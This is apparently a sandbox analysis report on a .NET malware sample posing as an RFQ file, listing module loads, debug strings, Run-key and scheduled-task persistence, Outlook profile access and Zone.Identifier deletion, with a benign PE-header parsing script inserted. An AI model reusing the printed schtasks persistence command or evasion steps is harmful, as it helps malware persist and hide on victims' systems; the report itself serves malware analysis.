                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntmarta.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb1 source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbv source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdbRSDS source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: System.Windows.Forms.ni.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: System.Drawing.ni.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, vexplorers.exe, 00000034.00000000.1950262138.00000000008B2000.00000002.00000001.01000000.0000000B.sdmp, vexplorers.exe.15.dr
                    Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: System.Drawing.ni.pdbRSDS source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: .pdbHJ source: svchost.exe, 00000008.00000002.1993163112.000000A226562000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.pdb source: WERBC7D.tmp.dmp.31.dr
                    Source: Binary string: System.Windows.Forms.pdb` source: WERA82A.tmp.dmp.18.dr
                    Source: Binary string: System.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: svchost.exe, 00000008.00000002.2008517923.000001A4FFF58000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: System.Core.ni.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: C:\Users\user\AppData\Roaming\svchost.PDB source: svchost.exe, 00000008.00000002.1993163112.000000A226562000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, vexplorers.exe, 00000034.00000000.1950262138.00000000008B2000.00000002.00000001.01000000.0000000B.sdmp, vexplorers.exe.15.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: svchost.exe, 00000008.00000002.2007386416.000001A4FE0AC000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: pC:\Users\user\AppData\Roaming\svchost.PDB@ source: svchost.exe, 00000008.00000002.1993163112.000000A226562000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.Drawing.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: Microsoft.VisualBasic.pdbp^y source: WERD370.tmp.dmp.40.dr
                    Source: Binary string: mscorlib.ni.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: 91\??\C:\Windows\symbols\dll\mscorlib.pdbx source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF76000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb\??\C:\Windows\mscorlib.pdb source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb- source: WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: svchost.PDB source: svchost.exe, 00000008.00000002.1993163112.000000A226562000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\mscorlib.pdban) source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: Binary string: mscorlib.pdbSystem.Windows.Forms.ni.dllMZ source: WERBC7D.tmp.dmp.31.dr
                    Source: Binary string: mscorlib.pdb@Yx source: WERD370.tmp.dmp.40.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WERD370.tmp.dmp.40.dr, WERF243.tmp.dmp.51.dr, WERBC7D.tmp.dmp.31.dr, WERA82A.tmp.dmp.18.dr
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Static PE information: 0xFAFBEEAE [Sat Jun 9 06:43:58 2103 UTC]
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Code function: 0_2_00007FFD9B98026B push esp; retf 4810h | 0_2_00007FFD9B980312
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 8_2_00007FFD9B95026B push esp; retf 4810h | 8_2_00007FFD9B950312
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 10_2_00007FFD9B97026B push esp; retf 4810h | 10_2_00007FFD9B970312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 15_2_010A0B4F push edi; ret | 15_2_010A0CC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 15_2_010A0C95 push edi; retf | 15_2_010A0C3A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 15_2_010AD9F7 push esp; retf | 15_2_010ADA05
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 26_2_00F30C3D push edi; ret | 26_2_00F30CC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 26_2_00F3D9FF push esp; retf | 26_2_00F3DA0D
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 27_2_00007FFD9B94026B push esp; retf 4810h | 27_2_00007FFD9B940312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 37_2_01090B4D push edi; ret | 37_2_01090CC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 37_2_01090C95 push edi; retf | 37_2_01090C3A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 37_2_0109D9FF push esp; retf | 37_2_0109DA0D
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 41_2_00007FFD9B98026B push esp; retf 4810h | 41_2_00007FFD9B980312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Code function: 48_2_010C0B4D push edi; ret | 48_2_010C0CC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Code function: 48_2_010C0C95 push edi; retf | 48_2_010C0C3A
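The static PE entries above (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, IMAGE_DIRECTORY_ENTRY_DEBUG and the 0xFAFBEEAE timestamp that decodes to 2103) can be reproduced on the sample with the script below. It is an added example, not code from the Joe Sandbox report, and the sample path it runs against is an assumption taken from this report. The practitioner caveat it encodes: Roslyn deterministic builds (on by default in SDK-style .NET projects) store a content hash with the high bit set in the COFF TimeDateStamp, so a far-future compile time on a managed image is expected and is not evidence of timestomping on its own.

```powershell
# Added example; not code from the Joe Sandbox report. Reads the COFF TimeDateStamp, the CLR header
# entry and the DEBUG directory of a PE file with .NET only. Sample path below is assumed.

function Get-PeHeaderInfo {
    param([Parameter(Mandatory)][string]$Path)

    $b = [System.IO.File]::ReadAllBytes($Path)
    if ($b.Length -lt 0x40 -or $b[0] -ne 0x4D -or $b[1] -ne 0x5A) { throw "Not an MZ file: $Path" }
    $pe = [BitConverter]::ToInt32($b, 0x3C)                                   # e_lfanew
    if ($pe -le 0 -or ($pe + 0x88) -gt $b.Length -or [BitConverter]::ToUInt32($b, $pe) -ne 0x00004550) {
        throw "PE signature not found or headers truncated: $Path"
    }
    $coff        = $pe + 4                                                    # IMAGE_FILE_HEADER
    $numSections = [BitConverter]::ToUInt16($b, $coff + 2)
    $ts          = [BitConverter]::ToUInt32($b, $coff + 4)                    # TimeDateStamp
    $optSize     = [BitConverter]::ToUInt16($b, $coff + 16)
    $opt         = $coff + 20                                                 # IMAGE_OPTIONAL_HEADER
    $magic       = [BitConverter]::ToUInt16($b, $opt)
    if ($magic -eq 0x10B)     { $dirBase = $opt + 96;  $dirCount = [BitConverter]::ToUInt32($b, $opt + 92)  }  # PE32
    elseif ($magic -eq 0x20B) { $dirBase = $opt + 112; $dirCount = [BitConverter]::ToUInt32($b, $opt + 108) }  # PE32+
    else { throw ('Unknown optional header magic 0x{0:X}' -f $magic) }
    if ($dirBase + 16 * 8 -gt $b.Length) { throw "Optional header truncated: $Path" }

    # Section table: needed to map the DEBUG directory RVA to a file offset.
    $sections = @()
    $secBase = $opt + $optSize
    for ($i = 0; $i -lt $numSections -and ($secBase + 40 * ($i + 1)) -le $b.Length; $i++) {
        $s = $secBase + 40 * $i
        $sections += [pscustomobject]@{
            Rva     = [BitConverter]::ToUInt32($b, $s + 12)
            RawSize = [BitConverter]::ToUInt32($b, $s + 16)
            RawPtr  = [BitConverter]::ToUInt32($b, $s + 20)
        }
    }
    function RvaToOffset([uint32]$rva) {
        foreach ($s in $sections) {
            if ($rva -ge $s.Rva -and $rva -lt ($s.Rva + $s.RawSize)) { return [int]($rva - $s.Rva + $s.RawPtr) }
        }
        return -1
    }

    # Data directory 14 = IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (non-zero RVA: managed image),
    # 6 = IMAGE_DIRECTORY_ENTRY_DEBUG.
    $clrRva   = if ($dirCount -gt 14) { [BitConverter]::ToUInt32($b, $dirBase + 14 * 8) } else { 0 }
    $debugRva = if ($dirCount -gt 6)  { [BitConverter]::ToUInt32($b, $dirBase + 6 * 8) } else { 0 }
    $debugLen = if ($dirCount -gt 6)  { [BitConverter]::ToUInt32($b, $dirBase + 6 * 8 + 4) } else { 0 }

    $pdbPath = $null; $reproEntry = $false
    $dbgOff = if ($debugRva -ne 0) { RvaToOffset $debugRva } else { -1 }
    # Walk the 28-byte IMAGE_DEBUG_DIRECTORY entries: type 2 = CODEVIEW ('RSDS' + GUID + age + PDB path),
    # type 16 = REPRO, which a deterministic build emits to say the timestamp is a hash, not a time.
    for ($e = $dbgOff; $dbgOff -ge 0 -and ($e + 28) -le $dbgOff + $debugLen -and ($e + 28) -le $b.Length; $e += 28) {
        $type   = [BitConverter]::ToUInt32($b, $e + 12)
        $rawPtr = [int][BitConverter]::ToUInt32($b, $e + 24)                  # PointerToRawData
        if ($type -eq 16) { $reproEntry = $true }
        if ($type -eq 2 -and $rawPtr -gt 0 -and ($rawPtr + 24) -lt $b.Length -and [BitConverter]::ToUInt32($b, $rawPtr) -eq 0x53445352) {
            $start = $rawPtr + 24
            $end   = [Array]::IndexOf($b, [byte]0, $start)
            if ($end -gt $start) { $pdbPath = [Text.Encoding]::UTF8.GetString($b, $start, $end - $start) }
        }
    }

    $stamp = [DateTimeOffset]::FromUnixTimeSeconds([int64]$ts).UtcDateTime
    [pscustomobject]@{
        Path            = $Path
        TimeDateStamp   = '0x{0:X8}' -f $ts
        StampUtc        = $stamp
        InFuture        = $stamp -gt [DateTime]::UtcNow
        # Roslyn deterministic builds store a content hash with the high bit set here, which always
        # decodes to a date after 2038-01-19; on a managed image that alone does not prove timestomping.
        HighBitSet      = ($ts -band 0x80000000) -ne 0
        IsManaged       = $clrRva -ne 0
        ReproDebugEntry = $reproEntry
        PdbPath         = $pdbPath
    }
}

Get-PeHeaderInfo -Path 'C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe' | Format-List
```

Run against the sample, TimeDateStamp, IsManaged and HighBitSet should agree with the three static PE entries above; PdbPath shows whether the file itself carries a CodeView record, as opposed to the PDB strings the report recovered from process memory dumps.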

                    Persistence and Installation Behavior

                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | File created: C:\Users\user\AppData\Roaming\svchost.exe (2 entries)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe

                    Boot Survival

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vexplorers (3 entries)
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost (3 entries)
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe:Zone.Identifier read attributes | delete
